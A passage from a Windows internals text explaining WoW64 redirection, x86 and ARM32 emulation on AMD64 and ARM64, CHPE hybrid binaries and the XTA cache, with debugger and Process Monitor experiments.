function. However, the mechanism can have issues with delay-loaded DLLs,
opening files through the common file dialog and even internationalization—
because once redirection is disabled, the system no longer uses it during
internal loading either, and certain 64-bit-only files would then fail to be
found. Using the %SystemRoot%\Sysnative path or some of the other
consistent paths introduced earlier is usually a safer methodology for
developers to use.
Note
Because certain 32-bit applications might indeed be aware and able to
deal with 64-bit images, a virtual directory, \Windows\Sysnative, allows
any I/Os originating from a 32-bit application to this directory to be
exempted from file redirection. This directory doesn’t actually exist—it is
a virtual path that allows access to the real System32 directory, even from
an application running under WoW64.
Registry redirection
Applications and components store their configuration data in the registry.
Components usually write their configuration data in the registry when they
are registered during installation. If the same component is installed and
registered both as a 32-bit binary and a 64-bit binary, the last component
registered will override the registration of the previous component because
they both write to the same location in the registry.
To help solve this problem transparently without introducing any code
changes to 32-bit components, the registry is split into two portions: Native
and WoW64. By default, 32-bit components access the 32-bit view, and 64-
bit components access the 64-bit view. This provides a safe execution
environment for 32-bit and 64-bit components and separates the 32-bit
application state from the 64-bit one, if it exists.
As discussed later in the “System calls” section, the WoW64 system call
layer intercepts all the system calls invoked by a 32-bit process. When
WoW64 intercepts the registry system calls that open or create a registry key,
it translates the key path to point to the WoW64 view of the registry (unless
the caller explicitly asks for the 64-bit view.) WoW64 can keep track of the
redirected keys thanks to multiple tree data structures, which store a list of
shared and split registry keys and subkeys (an anchor tree node defines where
the system should begin the redirection). WoW64 redirects the registry at
these points:
■ HKLM\SOFTWARE
■ HKEY_CLASSES_ROOT
Not the entire hive is split. Subkeys belonging to those root keys can be
stored in the private WoW64 part of the registry (in this case, the subkey is a
split key). Otherwise, the subkey can be kept shared between 32-bit and 64-
bit apps (in this case, the subkey is a shared key). Under each of the split
keys (in the position tracked by an anchor node), WoW64 creates a key
called WoW6432Node (for x86 application) or WowAA32Node (for ARM32
applications). Under this key is stored 32-bit configuration information. All
other portions of the registry are shared between 32-bit and 64-bit
applications (for example, HKLM\SYSTEM).
As extra help, if an x86 32-bit application writes a REG_SZ or
REG_EXPAND_SZ value that starts with the data “%ProgramFiles%” or
%CommonProgramFiles%” to the registry, WoW64 modifies the actual
values to “%ProgramFiles(x86)%” and %CommonProgramFiles(x86)%” to
match the file system redirection and layout explained earlier. The 32-bit
application must write exactly these strings using this case—any other data
will be ignored and written normally.
For applications that need to explicitly specify a registry key for a certain
view, the following flags on the RegOpenKeyEx, RegCreateKeyEx,
RegOpenKeyTransacted, RegCreateKeyTransacted, and RegDeleteKeyEx
functions permit this:
■ KEY_WoW64_64KEY Explicitly opens a 64-bit key from either a
32-bit or 64-bit application and disables the REG_SZ or
REG_EXPAND_SZ interception explained earlier
■ KEY_WoW64_32KEY Explicitly opens a 32-bit key from either a
32-bit or 64-bit application
X86 simulation on AMD64 platforms
The interface of the x86 simulator for AMD64 platforms (Wow64cpu.dll) is
pretty simple. The simulator process initialization function enables the fast
system call interface, depending on the presence of software MBEC (Mode
Based Execute Control is discussed in Chapter 9). When the WoW64 core
starts the simulation by invoking the BtCpuSimulate simulator’s interface, the
simulator builds the WoW64 stack frame (based on the 32-bit CPU context
provided by the WoW64 core), initializes the Turbo thunks array for
dispatching fast system calls, and prepares the FS segment register to point to
the thread’s 32-bit TEB. It finally sets up a call gate targeting a 32-bit
segment (usually the segment 0x20), switches the stacks, and emits a far
jump to the final 32-bit entry point (at the first execution, the entry point is
set to the 32-bit version of the LdrInitializeThunk loader function). When the
CPU executes the far jump, it detects that the call gate targets a 32-bit
segment, thus it changes the CPU execution mode to 32-bit. The code
execution exits 32-bit mode only in case of an interrupt or a system call being
dispatched. More details about call gates are available in the Intel and AMD
software development manuals.
Note
During the first switch to 32-bit mode, the simulator uses the IRET
opcode instead of a far call. This is because all the 32-bit registers,
including volatile registers and EFLAGS, need to be initialized.
System calls
For 32-bit applications, the WoW64 layer acts similarly to the NT kernel:
special 32-bit versions of Ntdll.dll, User32.dll, and Gdi32.dll are located in
the \Windows\Syswow64 folder (as well as certain other DLLs that perform
interprocess communication, such as Rpcrt4.dll). When a 32-bit application
requires assistance from the OS, it invokes functions located in the special
32-bit versions of the OS libraries. Like their 64-bit counterparts, the OS
routines can perform their job directly in user mode, or they can require
assistance from the NT kernel. In the latter case, they invoke system calls
through stub functions like the one implemented in the regular 64-bit Ntdll.
The stub places the system call index into a register, but, instead of issuing
the native 32-bit system call instruction, it invokes the WoW64 system call
dispatcher (through the Wow64Transition variable compiled by the WoW64
core).
The WoW64 system call dispatcher is implemented in the platform-
specific simulator (wow64cpu.dll). It emits another far jump for transitioning
to the native 64-bit execution mode, exiting from the simulation. The binary
translator switches the stack to the 64-bit one and saves the old CPU’s
context. It then captures the parameters associated with the system call and
converts them. The conversion process is called “thunking” and allows
machine code executed following the 32-bit ABI to interoperate with 64-bit
code. The calling convention (which is described by the ABI) defines how
data structure, pointers, and values are passed in parameters of each function
and accessed through the machine code.
Thunking is performed in the simulator using two strategies. For APIs that
do not interoperate with complex data structures provided by the client (but
deal with simple input and output values), the Turbo thunks (small
conversion routines implemented in the simulator) take care of the
conversion and directly invoke the native 64-bit API. Other complex APIs
need the Wow64SystemServiceEx routine’s assistance, which extracts the
correct WoW64 system call table number from the system call index and
invokes the correct WoW64 system call function. WoW64 system calls are
implemented in the WoW64 core library and in Wow64win.dll and have the
same name as the native system calls but with the wh- prefix. (So, for
example, the NtCreateFile WoW64 API is called whNtCreateFile.)
After the conversion has been correctly performed, the simulator issues the
corresponding native 64-bit system call. When the native system call returns,
WoW64 converts (or thunks) any output parameters if necessary, from 64-bit
to 32-bit formats, and restarts the simulation.
Exception dispatching
Similar to WoW64 system calls, exception dispatching forces the CPU
simulation to exit. When an exception happens, the NT kernel determines
whether it has been generated by a thread executing user-mode code. If so,
the NT kernel builds an extended exception frame on the active stack and
dispatches the exception by returning to the user-mode
KiUserExceptionDispatcher function in the 64-bit Ntdll (for more
information about exceptions, refer to the “Exception dispatching” section
earlier in this chapter).
Note that a 64-bit exception frame (which includes the captured CPU
context) is allocated in the 32-bit stack that was currently active when the
exception was generated. Thus, it needs to be converted before being
dispatched to the CPU simulator. This is exactly the role of the
Wow64PrepareForException function (exported by the WoW64 core
library), which allocates space on the native 64-bit stack and copies the
native exception frame from the 32-bit stack in it. It then switches to the 64-
bit stack and converts both the native exception and context records to their
relative 32-bit counterpart, storing the result on the 32-bit stack (replacing the
64-bit exception frame). At this point, the WoW64 Core can restart the
simulation from the 32-bit version of the KiUserExceptionDispatcher
function, which dispatches the exception in the same way the native 32-bit
Ntdll would.
32-bit user-mode APC delivery follows a similar implementation. A
regular user-mode APC is delivered through the native Ntdll’s
KiUserApcDispatcher. When the 64-bit kernel is about to dispatch a user-
mode APC to a WoW64 process, it maps the 32-bit APC address to a higher
range of 64-bit address space. The 64-bit Ntdll then invokes the
Wow64ApcRoutine routine exported by the WoW64 core library, which
captures the native APC and context record in user mode and maps it back in
the 32-bit stack. It then prepares a 32-bit user-mode APC and context record
and restarts the CPU simulation from the 32-bit version of the
KiUserApcDispatcher function, which dispatches the APC the same way the
native 32-bit Ntdll would.
ARM
ARM is a family of Reduced Instruction Set Computing (RISC) architectures
originally designed by the ARM Holding company. The company, unlike
Intel and AMD, designs the CPU’s architecture and licenses it to other
companies, such as Qualcomm and Samsung, which produce the final CPUs.
As a result, there have been multiple releases and versions of the ARM
architecture, which have quickly evolved during the years, starting from very
simple 32-bit CPUs, initially brought by the ARMv3 generation in the year
1993, up to the latest ARMv8. The, latest ARM64v8.2 CPUs natively support
multiple execution modes (or states), most commonly AArch32, Thumb-2,
and AArch64:
■ AArch32 is the most classical execution mode, where the CPU
executes 32-bit code only and transfers data to and from the main
memory through a 32-bit bus using 32-bit registers.
■ Thumb-2 is an execution state that is a subset of the AArch32 mode.
The Thumb instruction set has been designed for improving code
density in low-power embedded systems. In this mode, the CPU can
execute a mix of 16-bit and 32-bit instructions, while still accessing
32-bit registers and memory.
■ AArch64 is the modern execution mode. The CPU in this execution
state has access to 64-bit general purpose registers and can transfer
data to and from the main memory through a 64-bit bus.
Windows 10 for ARM64 systems can operate in the AArch64 or Thumb-2
execution mode (AArch32 is generally not used). Thumb-2 was especially
used in old Windows RT systems. The current state of an ARM64 processor
is determined also by the current Exception level (EL), which defines
different levels of privilege: ARM currently defines three exception levels
and two security states. They are both discussed more in depth in Chapter 9
and in the ARM Architecture Reference Manual.
Memory models
In the “Hardware side-channel vulnerabilities” earlier in this chapter, we
introduced the concept of a cache coherency protocol, which guarantees that
the same data located in a CPU’s core cache is observed while accessed by
multiple processors (MESI is one of the most famous cache coherency
protocols). Like the cache coherency protocol, modern CPUs also should
provide a memory consistency (or ordering) model for solving another
problem that can arise in multiprocessor environments: memory reordering.
Some architectures (ARM64 is an example) are indeed free to re-order
memory accesses with the goal to make more efficient use of the memory
subsystem and parallelize memory access instructions (achieving better
performance while accessing the slower memory bus). This kind of
architecture follows a weak memory model, unlike the AMD64 architecture,
which follows a strong memory model, in which memory access instructions
are generally executed in program order. Weak models allow the processor to
be faster and access the memory in a more efficient way but bring a lot of
synchronization issues when developing multiprocessor software. In contrast,
a strong model is more intuitive and stable, but it has the big drawback of
being slower.
CPUs that can do memory reordering (following the weak model) provide
some machine instructions that act as memory barriers. A barrier prevents
the processor from reordering memory accesses before and after the barrier,
helping multiprocessors synchronization issues. Memory barriers are slow;
thus, they are used only when strictly needed by critical multiprocessor code
in Windows, especially in synchronization primitives (like spinlocks,
mutexes, pushlocks, and so on).
As we describe in the next section, the ARM64 jitter always makes use of
memory barriers while translating x86 code in a multiprocessor environment.
Indeed, it can’t infer whether the code that will execute could be run by
multiple threads in parallel at the same time (and thus have potential
synchronization issues. X86 follows a strong memory model, so it does not
have the reordering issue, a part of generic out-of-order execution as
explained in the previous section).
Note
Other than the CPU, memory reordering can also affect the compiler,
which, during compilation time, can reorder (and possibly remove)
memory references in the source code for efficiency and speed reasons.
This kind of reordering is called compiler reordering, whereas the type
described in the previous section is processor reordering.
ARM32 simulation on ARM64 platforms
The simulation of ARM32 applications under ARM64 is performed in a very
similar way as for x86 under AMD64. As discussed in the previous section,
an ARM64v8 CPU is capable of dynamic switching between the AArch64
and Thumb-2 execution state (so it can execute 32-bit instructions directly in
hardware). However, unlike AMD64 systems, the CPU can’t switch
execution mode in user mode via a specific instruction, so the WoW64 layer
needs to invoke the NT kernel to request the execution mode switch. To do
this, the BtCpuSimulate function, exported by the ARM-on-ARM64 CPU
simulator (Wowarmhw.dll), saves the nonvolatile AArch64 registers in the
64-bit stack, restores the 32-bit context stored in WoW64 CPU area, and
finally emits a well-defined system call (which has an invalid syscall number,
–1).
The NT kernel exception handler (which, on ARM64, is the same as the
syscall handler), detects that the exception has been raised due to a system
call, thus it checks the syscall number. In case the number is the special –1,
the NT kernel knows that the request is due to an execution mode change
coming from WoW64. In that case, it invokes the KiEnter32BitMode routine,
which sets the new execution state for the lower EL (exception level) to
AArch32, dismisses the exception, and returns to user mode.
The code starts the execution in AArch32 state. Like the x86 simulator for
AMD64 systems, the execution controls return to the simulator only in case
an exception is raised or a system call is invoked. Both exceptions and
system calls are dispatched in an identical way as for the x86 simulator under
AMD64.
X86 simulation on ARM64 platforms
The x86-on-ARM64 CPU simulator (Xtajit.dll) is different from other binary
translators described in the previous sections, mostly because it cannot
directly execute x86 instructions using the hardware. The ARM64 processor
is simply not able to understand any x86 instruction. Thus, the x86-on-ARM
simulator implements a full x86 emulator and a jitter, which can translate
blocks of x86 opcodes in AArch64 code and execute the translated blocks
directly.
When the simulator process initialization function (BtCpuProcessInit) is
invoked for a new WoW64 process, it builds the jitter main registry key for
the process by combining the
HKLM\SOFTWARE\Microsoft\Wow64\x86\xtajit path with the name of the
main process image. If the key exists, the simulator queries multiple
configuration information from it (most common are the multiprocessor
compatibility and JIT block threshold size. Note that the simulator also
queries configuration settings from the application compatibility database.)
The simulator then allocates and compiles the Syscall page, which, as the
name implies, is used for emitting x86 syscalls (the page is then linked to
Ntdll thanks to the Wow64Transition variable). At this point, the simulator
determines whether the process can use the XTA cache.
The simulator uses two different caches for storing precompiled code
blocks: The internal cache is allocated per-thread and contains code blocks
generated by the simulator while compiling x86 code executed by the thread
(those code blocks are called jitted blocks); the external XTA cache is
managed by the XtaCache service and contains all the jitted blocks generated
lazily for an x86 image by the XtaCache service. The per-image XTA cache
is stored in an external cache file (more details provided later in this chapter.)
The process initialization routine allocates also the Compile Hybrid
Executable (CHPE) bitmap, which covers the entire 4-GB address space
potentially used by a 32-bit process. The bitmap uses a single bit to indicate
that a page of memory contains CHPE code (CHPE is described later in this
chapter.)
The simulator thread initialization routine (BtCpuThreadInit) initializes the
compiler and allocates the per-thread CPU state on the native stack, an
important data structure that contains the per-thread compiler state, including
the x86 thread context, the x86 code emitter state, the internal code cache,
and the configuration of the emulated x86 CPU (segment registers, FPU
state, emulated CPUIDs.)
Simulator’s image load notification
Unlike any other binary translator, the x86-on-ARM64 CPU simulator must
be informed any time a new image is mapped in the process address space,
including for the CHPE Ntdll. This is achieved thanks to the WoW64 core,
which intercepts when the NtMapViewOfSection native API is called from the
32-bit code and informs the Xtajit simulator through the exported
BTCpuNotifyMapViewOfSection routine. It is important that the notification
happen because the simulator needs to update the internal compiler data, such
as
■ The CHPE bitmap (which needs to be updated by setting bits to 1
when the target image contains CHPE code pages)
■ The internal emulated CFG (Control Flow Guard) state
■ The XTA cache state for the image
In particular, whenever a new x86 or CHPE image is loaded, the simulator
determines whether it should use the XTA cache for the module (through
registry and application compatibility shim.) In case the check succeeded, the
simulator updates the global per-process XTA cache state by requesting to
the XtaCache service the updated cache for the image. In case the XtaCache
service is able to identify and open an updated cache file for the image, it
returns a section object to the simulator, which can be used to speed up the
execution of the image. (The section contains precompiled ARM64 code
blocks.)
Compiled Hybrid Portable Executables (CHPE)
Jitting an x86 process in ARM64 environments is challenging because the
compiler should keep enough performance to maintain the application
responsiveness. One of the major issues is tied to the memory ordering
differences between the two architectures. The x86 emulator does not know
how the original x86 code has been designed, so it is obliged to aggressively
use memory barriers between each memory access made by the x86 image.
Executing memory barriers is a slow operation. On average, about 40% of
many applications’ time is spent running operating system code. This meant
that not emulating OS libraries would have allowed a gain in a lot of overall
applications’ performance.
These are the motivations behind the design of Compiled Hybrid Portable
Executables (CHPE). A CHPE binary is a special hybrid executable that
contains both x86 and ARM64-compatible code, which has been generated
with full awareness of the original source code (the compiler knew exactly
where to use memory barriers). The ARM64-compatible machine code is
called hybrid (or CHPE) code: it is still executed in AArch64 mode but is
generated following the 32-bit ABI for a better interoperability with x86
code.
CHPE binaries are created as standard x86 executables (the machine ID is
still 014C as for x86); the main difference is that they include hybrid code,
described by a table in the Hybrid Image metadata (stored as part of the
image load configuration directory). When a CHPE binary is loaded into the
WoW64 process’s address space, the simulator updates the CHPE bitmap by
setting a bit to 1 for each page containing hybrid code described by the
Hybrid metadata. When the jitter compiles the x86 code block and detects
that the code is trying to invoke a hybrid function, it directly executes it
(using the 32-bit stack), without wasting any time in any compilation.
The jitted x86 code is executed following a custom ABI, which means that
there is a nonstandard convention on how the ARM64 registers are used and
how parameters are passed between functions. CHPE code does not follow
the same register conventions as jitted code (although hybrid code still
follows a 32-bit ABI). This means that directly invoking CHPE code from
the jitted blocks built by the compiler is not directly possible. To overcome
this problem, CHPE binaries also include three different kinds of thunk
functions, which allow the interoperability of CHPE with x86 code:
■ A pop thunk allows x86 code to invoke a hybrid function by
converting incoming (or outgoing) arguments from the guest (x86)
caller to the CHPE convention and by directly transferring execution
to the hybrid code.
■ A push thunk allows CHPE code to invoke an x86 routine by
converting incoming (or outgoing) arguments from the hybrid code to
the guest (x86) convention and by calling the emulator to resume
execution on the x86 code.
■ An export thunk is a compatibility thunk created for supporting
applications that detour x86 functions exported from OS modules
with the goal of modifying their functionality. Functions exported
from CHPE modules still contain a little amount of x86 code (usually
8 bytes), which semantically does not provide any sort of
functionality but allows detours to be inserted by the external
application.
The x86-on-ARM simulator makes the best effort to always load CHPE
system binaries instead of standard x86 ones, but this is not always possible.
In case a CHPE binary does not exist, the simulator will load the standard
x86 one from the SysWow64 folder. In this case, the OS module will be
jitted entirely.
EXPERIMENT: Dumping the hybrid code address
range table
The Microsoft Incremental linker (link.exe) tool included in the
Windows SDK and WDK is able to show some information stored
in the hybrid metadata of the Image load configuration directory of
a CHPE image. More information about the tool and how to install
it are available in Chapter 9.
In this experiment, you will dump the hybrid metadata of
kernelbase.dll, a system library that also has been compiled with
CHPE support. You also can try the experiment with other CHPE
libraries. After having installed the SDK or WDK on a ARM64
machine, open the Visual Studio Developer Command Prompt (or
start the LaunchBuildEnv.cmd script file in case you are using the
EWDK’s Iso image.) Move to the CHPE folder and dump the
image load configuration directory of the kernelbase.dll file
through the following commands:
Click here to view code image
cd c:\Windows\SyChpe32
link /dump /loadconfig kernelbase.dll >
kernelbase_loadconfig.txt
Note that in the example, the command output has been
redirected to the kernelbase_loadconfig.txt text file because it was
too large to be easily displayed in the console. Open the text file
with Notepad and scroll down until you reach the following text:
Click here to view code image
Section contains the following hybrid metadata:
4 Version
102D900C Address of WowA64 exception handler
function pointer
102D9000 Address of WowA64 dispatch call function
pointer
102D9004 Address of WowA64 dispatch indirect call
function pointer
102D9008 Address of WowA64 dispatch indirect call
function pointer (with CFG check)
102D9010 Address of WowA64 dispatch return function
pointer
102D9014 Address of WowA64 dispatch leaf return
function pointer
102D9018 Address of WowA64 dispatch jump function
pointer
102DE000 Address of WowA64 auxiliary import address
table pointer
1011DAC8 Hybrid code address range table
4 Hybrid code address range count
Hybrid Code Address Range Table
Address Range
----------------------
x86 10001000 - 1000828F (00001000 - 0000828F)
arm64 1011E2E0 - 1029E09E (0011E2E0 - 0029E09E)
x86 102BA000 - 102BB865 (002BA000 - 002BB865)
arm64 102BC000 - 102C0097 (002BC000 - 002C0097)
The tool confirms that kernelbase.dll has four different ranges in
the Hybrid code address range table: two sections contain x86 code
(actually not used by the simulator), and two contain CHPE code
(the tool shows the term “arm64” erroneously.)
The XTA cache
As introduced in the previous sections, the x86-on-ARM64 simulator, other
than its internal per-thread cache, uses an external global cache called XTA
cache, managed by the XtaCache protected service, which implements the
lazy jitter. The service is an automatic start service, which, when started,
opens (or creates) the C:\Windows\XtaCache folder and protects it through a
proper ACL (only the XtaCache service and members of the Administrators
group have access to the folder). The service starts its own ALPC server
through the {BEC19D6F-D7B2-41A8-860C-8787BB964F2D} connection
port. It then allocates the ALPC and lazy jit worker threads before exiting.
The ALPC worker thread is responsible in dispatching all the incoming
requests to the ALPC server. In particular, when the simulator (the client),
running in the context of a WoW64 process, connects to the XtaCache
service, a new data structure tracking the x86 process is created and stored in
an internal list, together with a 128 KB memory mapped section, which is
shared between the client and XtaCache (the memory backing the section is
internally called Trace buffer). The section is used by the simulator to send
hints about the x86 code that has been jitted to execute the application and
was not present in any cache, together with the module ID to which they
belong. The information stored in the section is processed every 1 second by
the XTA cache or in case the buffer becomes full. Based on the number of
valid entries in the list, the XtaCache can decide to directly start the lazy
jitter.
When a new image is mapped into an x86 process, the WoW64 layer
informs the simulator, which sends a message to the XtaCache looking for an
already-existing XTA cache file. To find the cache file, the XtaCache service
should first open the executable image, map it, and calculate its hashes. Two
hashes are generated based on the executable image path and its internal
binary data. The hashes are important because they avoid the execution of
jitted blocks compiled for an old stale version of the executable image. The
XTA cache file name is then generated using the following name scheme:
<module name>.<module header hash>.<module path hash>.
<multi/uniproc>. <cache file version>.jc. The cache file contains all the
precompiled code blocks, which can be directly executed by the simulator.
Thus, in case a valid cache file exists, the XtaCache creates a file-mapped
section and injects it into the client WoW64 process.
The lazy jitter is the engine of the XtaCache. When the service decides to
invoke it, a new version of the cache file representing the jitted x86 module
is created and initialized. The lazy jitter then starts the lazy compilation by
invoking the XTA offline compiler (xtac.exe). The compiler is started in a
protected low-privileged environment (AppContainer process), which runs in
low-priority mode. The only job of the compiler is to compile the x86 code
executed by the simulator. The new code blocks are added to the ones located
in the old version of the cache file (if one exists) and stored in a new version
of the cache file.
EXPERIMENT: Witnessing the XTA cache
Newer versions of Process Monitor can run natively on ARM64
environments. You can use Process Monitor to observe how an
XTA cache file is generated and used for an x86 process. In this
experiment, you need an ARM64 system running at least Windows
10 May 2019 update (1903). Initially, you need to be sure that the
x86 application used for the experiment has never before been
executed by the system. In this example, we will install an old x86
version of MPC-HC media player, which can be downloaded from
https://sourceforge.net/projects/mpc-hc/files/latest/download. Any
x86 application is well suited for this experiment though.
Install MPC-HC (or your preferred x86 application), but, before
running it, open Process Monitor and add a filter on the XtaCache
service’s process name (XtaCache.exe, as the service runs in its
own process; it is not shared.) The filter should be configured as in
the following figure:
If not already done, start the events capturing by selecting
Capture Events from the File menu. Then launch MPC-HC and try
to play some video. Exit MPC-HC and stop the event capturing in
Process Monitor. The number of events displayed by Process
Monitor are significant. You can filter them by removing the
registry activity by clicking the corresponding icon on the toolbar
(in this experiment, you are not interested in the registry).
If you scroll the event list, you will find that the XtaCache
service first tried to open the MPC-HC cache file, but it failed
because the file didn’t exist. This meant that the simulator started
to compile the x86 image on its own and periodically sent
information to the XtaCache. Later, the lazy jitter would have been
invoked by a worker thread in the XtaCache. The latter created a
new version of the Xta cache file and invoked the Xtac compiler,
mapping the cache file section to both itself and Xtac:
If you restart the experiment, you would see different events in
Process Monitor: The cache file will be immediately mapped into
the MPC-HC WoW64 process. In that way, the emulator can
execute it directly. As a result, the execution time should be faster.
You can also try to delete the generated XTA cache file. The
XtaCache service automatically regenerates it after you launch the
MPC-HC x86 application again.
However, remember that the %SystemRoot%\XtaCache folder is
protected through a well-defined ACL owned by the XtaCache
service itself. To access it, you should open an administrative
command prompt window and insert the following commands:
Click here to view code image
takeown /f c:\windows\XtaCache
icacls c:\Windows\XtaCache /grant Administrators:F
Jitting and execution
To start the guest process, the x86-on-ARM64 CPU simulator has no other
chances than interpreting or jitting the x86 code. Interpreting the guest code
means translating and executing one machine instruction at time, which is a
slow process, so the emulator supports only the jitting strategy: it
dynamically compiles x86 code to ARM64 and stores the result in a guest
“code block” until certain conditions happen:
■ An illegal opcode or a data or instruction breakpoint have been
detected.
■ A branch instruction targeting an already-visited block has been
encountered.
■ The block is bigger than a predetermined limit (512 bytes).
The simulation engine works by first checking in the local and XTA cache
whether a code block (indexed by its RVA) already exists. If the block exists
in the cache, the simulator directly executes it using a dispatcher routine,
which builds the ARM64 context (containing the host registers values) and
stores it in the 64-bit stack, switches to the 32-bit stack, and prepares it for
the guest x86 thread state. Furthermore, it also prepares the ARM64 registers
to run the jitted x86 code (storing the x86 context in them). Note that a well-
defined non-standard calling convention exists: the dispatcher is similar to a
pop thunk used for transferring the execution from a CHPE to an x86
context.
When the execution of the code block ends, the dispatcher does the
opposite: It saves the new x86 context in the 32-bit stack, switches to the 64-
bit stack, and restores the old ARM64 context containing the state of the
simulator. When the dispatcher exits, the simulator knows the exact x86
virtual address where the execution was interrupted. It can then restart the
emulation starting from that new memory address. Similar to cached entries,
the simulator checks whether the target address points to a memory page
containing CHPE code (it knows this information thanks to the global CHPE
bitmap). If that is the case, the simulator resolves the pop thunk for the target
function, adds its address to the thread’s local cache, and directly executes it.
In case one of the two described conditions verifies, the simulator can have
performances similar to executing native images. Otherwise, it needs to
invoke the compiler for building the native translated code block. The
compilation process is split into three phases:
1.
The parsing stage builds instructions descriptors for each opcode that
needs to be added in the code block.
2.
The optimization stage optimizes the instruction flow.
3.
Finally, the code generation phase writes the final ARM64 machine
code in the new code block.
The generated code block is then added to the per-thread local cache. Note
that the simulator cannot add it in the XTA cache, mainly for security and
performance reasons. Otherwise, an attacker would be allowed to pollute the
cache of a higher-privileged process (as a result, the malicious code could
have potentially been executed in the context of the higher-privileged
process.) Furthermore, the simulator does not have enough CPU time to
generate highly optimized code (even though there is an optimization stage)
while maintaining the application’s responsiveness.
However, information about the compiled x86 blocks, together with the ID
of the binary hosting the x86 code, are inserted into the list mapped by the
shared Trace buffer. The lazy jitter of the XTA cache knows that it needs to
compile the x86 code jitted by the simulator thanks to the Trace buffer. As a
result, it generates optimized code blocks and adds them in the XTA cache
file for the module, which will be directly executed by the simulator. Only
the first execution of the x86 process is generally slower than the others.
System calls and exception dispatching
Under the x86-on-ARM64 CPU simulator, when an x86 thread performs a
system call, it invokes the code located in the syscall page allocated by the
simulator, which raises the exception 0x2E. Each x86 exception forces the
code block to exit. The dispatcher, while exiting from the code block,
dispatches the exception through an internal function that ends up in invoking
the standard WoW64 exception handler or system call dispatcher (depending
on the exception vector number.) Those have been already discussed in the
previous X86 simulation on AMD64 platforms section of this chapter.
EXPERIMENT: Debugging WoW64 in ARM64
environments
Newer releases of WinDbg (the Windows Debugger) are able to
debug machine code run under any simulator. This means that in
ARM64 systems, you will be able to debug native ARM64, ARM
Thumb-2, and x86 applications, whereas in AMD64 systems, you
can debug only 32- and 64-bit x86 programs. The debugger is also
able to easily switch between the native 64-bit and 32-bit stacks,
which allows the user to debug both native (including the WoW64
layer and the emulator) and guest code (furthermore, the debugger
also supports CHPE.)
In this experiment, you will open an x86 application using an
ARM64 machine and switch between three execution modes:
ARM64, ARM Thumb-2, and x86. For this experiment, you need
to install a recent version of the Debugging tools, which you can
find in the WDK or SDK. After installing one of the kits, open the
ARM64 version of Windbg (available from the Start menu.)
Before starting the debug session, you should disable the
exceptions that the XtaJit emulator generates, like Data Misaligned
and in-page I/O errors (these exceptions are already handled by the
emulator itself). From the Debug menu, click Event Filters. From
the list, select the Data Misaligned event and check the Ignore
option box from the Execution group. Repeat the same for the In-
page I/O error. At the end, your configuration should look similar
to the one in following figure:
Click Close, and then from the main debugger interface, select
Open Executable from the File menu. Choose one of the 32-bit
x86 executables located in %SystemRoot%\SysWOW64 folder. (In
this example, we are using notepad.exe, but any x86 application
works.) Also open the disassembly window by selecting it through
the View menu. If your symbols are configured correctly (refer to
the https://docs.microsoft.com/en-us/windows-
hardware/drivers/debugger/symbol-path webpage for instructions
on how to configure symbols), you should see the first native Ntdll
breakpoint, which can be confirmed by displaying the stack with
the k command:
Click here to view code image
0:000> k
# Child-SP RetAddr Call Site
00 00000000`001eec70 00007ffb`bd47de00
ntdll!LdrpDoDebuggerBreak+0x2c
01 00000000`001eec90 00007ffb`bd47133c
ntdll!LdrpInitializeProcess+0x1da8
02 00000000`001ef580 00007ffb`bd428180
ntdll!_LdrpInitialize+0x491ac
03 00000000`001ef660 00007ffb`bd428134
ntdll!LdrpInitialize+0x38
04 00000000`001ef680 00000000`00000000
ntdll!LdrInitializeThunk+0x14
The simulator is still not loaded at this time: The native and
CHPE Ntdll have been mapped into the target binary by the NT
kernel, while the WoW64 core binaries have been loaded by the
native Ntdll just before the breakpoint via the LdrpLoadWow64
function. You can check that by enumerating the currently loaded
modules (via the lm command) and by moving to the next frame in
the stack via the .f+ command. In the disassembly window, you
should see the invocation of the LdrpLoadWow64 routine:
Click here to view code image
00007ffb`bd47dde4 97fed31b bl ntdll!LdrpLoadWow64
(00007ffb`bd432a50)
Now resume the execution with the g command (or F5 key).
You should see multiple modules being loaded in the process
address space and another breakpoint raising, this time under the
x86 context. If you again display the stack via the k command, you
can notice that a new column is displayed. Furthermore, the
debugger added the x86 word in its prompt:
Click here to view code image
0:000:x86> k
# Arch ChildEBP RetAddr
00 x86 00acf7b8 77006fb8
ntdll_76ec0000!LdrpDoDebuggerBreak+0x2b
01 CHPE 00acf7c0 77006fb8
ntdll_76ec0000!#LdrpDoDebuggerBreak$push_thunk+0x48
02 CHPE 00acf820 76f44054
ntdll_76ec0000!#LdrpInitializeProcess+0x20ec
03 CHPE 00acfad0 76f43e9c
ntdll_76ec0000!#_LdrpInitialize+0x1a4
04 CHPE 00acfb60 76f43e34
ntdll_76ec0000!#LdrpInitialize+0x3c
05 CHPE 00acfb80 76ffc3cc
ntdll_76ec0000!LdrInitializeThunk+0x14
If you compare the new stack to the old one, you will see that the
stack addresses have drastically changed (because the process is
now executing using the 32-bit stack). Note also that some
functions have the # symbol preceding them: WinDbg uses that
symbol to represent functions containing CHPE code. At this point,
you can step into and over x86 code, as in regular x86 operating
systems. The simulator takes care of the emulation and hides all the
details. To observe how the simulator is running, you should move
to the 64-bit context through the .effmach command. The
command accepts different parameters: x86 for the 32-bit x86
context; arm64 or amd64 for the native 64-bit context (depending
on the target platform); arm for the 32-bit ARM Thumb2 context;
CHPE for the 32-bit CHPE context. Switching to the 64-bit stack in
this case is achieved via the arm64 parameter:
Click here to view code image
0:000:x86> .effmach arm64
Effective machine: ARM 64-bit (AArch64) (arm64)
0:000> k
# Child-SP RetAddr Call Site
00 00000000`00a8df30 00007ffb`bd3572a8
wow64!Wow64pNotifyDebugger+0x18f54
01 00000000`00a8df60 00007ffb`bd3724a4
wow64!Wow64pDispatchException+0x108
02 00000000`00a8e2e0 00000000`76e1e9dc
wow64!Wow64RaiseException+0x84
03 00000000`00a8e400 00000000`76e0ebd8
xtajit!BTCpuSuspendLocalThread+0x24c
04 00000000`00a8e4c0 00000000`76de04c8
xtajit!BTCpuResetFloatingPoint+0x4828
05 00000000`00a8e530 00000000`76dd4bf8
xtajit!BTCpuUseChpeFile+0x9088
06 00000000`00a8e640 00007ffb`bd3552c4
xtajit!BTCpuSimulate+0x98
07 00000000`00a8e6b0 00007ffb`bd353788
wow64!RunCpuSimulation+0x14
08 00000000`00a8e6c0 00007ffb`bd47de38
wow64!Wow64LdrpInitialize+0x138
09 00000000`00a8e980 00007ffb`bd47133c
ntdll!LdrpInitializeProcess+0x1de0
0a 00000000`00a8f270 00007ffb`bd428180
ntdll!_LdrpInitialize+0x491ac
0b 00000000`00a8f350 00007ffb`bd428134
ntdll!LdrpInitialize+0x38
0c 00000000`00a8f370 00000000`00000000
ntdll!LdrInitializeThunk+0x14
From the two stacks, you can see that the emulator was
executing CHPE code, and then a push thunk has been invoked to
